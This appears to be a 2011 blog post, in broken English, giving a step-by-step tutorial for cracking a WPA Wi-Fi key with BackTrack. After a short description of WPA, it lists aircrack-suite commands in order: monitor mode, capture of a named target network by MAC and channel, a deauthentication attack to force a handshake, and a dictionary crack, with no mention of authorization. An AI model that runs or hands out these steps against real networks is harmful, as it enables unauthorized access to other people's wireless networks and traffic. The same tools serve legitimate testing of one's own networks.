Sabtu, 24 September 2011


Wi-Fi Protected Access (WPA) is security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in response to serious weaknesses researchers had found in the previous system


WPA is a more powerful security technology for Wi-Fi networks than WEP. It provides strong data protection by using encryption as well as strong access controls and user authentication. WPA utilizes 128-bit encryption keys and dynamic session keys to ensure your wireless network's privacy and enterprise security.

in this time, i will explain how to crack wpa key using back|track.
before we begin, fisrt check compotible wifi card:




OK.. now we start mode monitoring "airmon-ng start wlan0"



monitoring mode is enabled on mon0 interface,,, we try to capture the network and select the target "airodump-ng mon0"




the target is Nirvana, we know that nirvana mac is 00:26:5A:F4:9A:7C in channel 9, now we can capture detail target is nirvana "airodump-ng -w monyonk --channel 9 --bssid 00:26:5A:F4:9A:7C mon0




now we try to deauthenticate so we have a wpa handshake to crack
"aireplay-ng -0 1 -a 00:26:5A:F4:9A:7C mon0"




you can see it..!!



now is the time a thrilling, coused its success depends on the password dictionary that we have,,,!!! I give advice to you in order to collect as much information of target . we use aircrack-ng to crack it,,,, "aircrack-ng -w /root/monyonk.lst nirvana-01.cap "






bingoooooOOOOOOOO..!!! 

1 komentar:

Anonim mengatakan...

good artcl

Posting Komentar